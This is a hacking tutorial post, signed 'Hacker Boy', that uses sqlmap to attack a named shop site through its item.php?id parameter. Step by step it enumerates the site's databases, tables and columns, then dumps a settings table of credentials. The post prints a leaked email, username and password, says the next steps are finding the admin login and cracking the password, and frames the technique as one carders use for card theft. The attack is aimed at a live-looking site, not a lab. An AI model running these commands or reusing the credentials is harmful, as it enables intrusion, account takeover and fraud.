2021-12-03 19:44:55
Target URL :Ā Ā http://www.acfurniture.com/item.php?id=25
A. ENUMERATE DATABASE NAME:
~# sqlmap -u āTARGET URLā --dbs
-uĀ /Ā --urlĀ : Target URL
--dbsĀ : Enumerate Database/s name
So, the command compiled would look like this:
~#Ā sqlmapĀ -uĀ āhttp://www.acfurniture.com/item.php?id=25āĀ --dbs
From the command above, the result should be look like this
We got the database name āacfurnitureā.
Command pattern:
~#Ā sqlmapĀ -uĀ āTARGET URLāĀ -DĀ database-nameĀ --tables
So, the command compiled be like this:
~#Ā sqlmapĀ -uĀ "http://www.acfurniture.com/item.php?id=25"Ā -DĀ acfurnitureĀ --tables
The result should be look like this:
So far, we can conclude that the arrangement of data is, the siteĀ acfurniture.comĀ has two databases,Ā acfurnitureĀ andĀ information_schema. The database namedĀ acfurnitureĀ contains four tables:Ā category, product, product_hacked,Ā andĀ settings. There is no compromised table name, but, letās investigate more. Let see what is insideĀ settingsĀ table. Inside the table is actually there are columns, and the data.
C. ENUMERATE COLUMNS
~#Ā sqlmapĀ -uĀ āTARGET URLāĀ -DĀ database-nameĀ -TĀ table-nameĀ --columns
So, the command compiled be like this:
~#Ā sqlmapĀ -uĀ "http://www.acfurniture.com/item.php?id=25"Ā -DĀ acfurnitureĀ -TĀ settingsĀ --columns
The output should be look like this:
TheĀ settingsĀ table consist ofĀ 6 columns, and this is actually a credential account. Lets dump those data.
D. DUMP DATA
Command pattern:
~#Ā sqlmapĀ -uĀ āTARGET URLāĀ -DĀ database-nameĀ -TĀ table-nameĀ -CĀ columnsĀ --dump
So, the command compiled be like this:
~#Ā sqlmapĀ -uĀ "http://www.acfurniture.com/item.php?id=25"Ā -DĀ acfurnitureĀ -TĀ settingsĀ -CĀ username,passwordĀ --dump
Or you can also dump all data inside the table, using command:
~#Ā sqlmapĀ -uĀ "http://www.acfurniture.com/item.php?id=25"Ā -DĀ acfurnitureĀ -TĀ settingsĀ --dump
The output should be look like this:
EmailĀ :Ā jackie@jackoarts.com
UsernameĀ : Handsome
Alright, we are done dumping data in database using SQL injection. Our next tasks are, to find theĀ doorĀ or admin panel, admin login page on the target sites. Before do that, make sure whether that password (9HPKO2NKrHbGmywzIzxUi) is encrypted or not, if so, then we need to decrypt it first. That is another topic, cracking and decrypting.
Even here we are not actually hacking into the target site, at least we have learned a lot about SQL injection using SQLMap in Kali Linux easily and we dump the credentials account. This technique is used mostly by carder (hacker who is looking for Credit Card account on E-commerce sites) which targeting Financial, banking, shop, or e-commerce sites which store their user credit card information.
557 viewsHacker Boy,Ā 16:44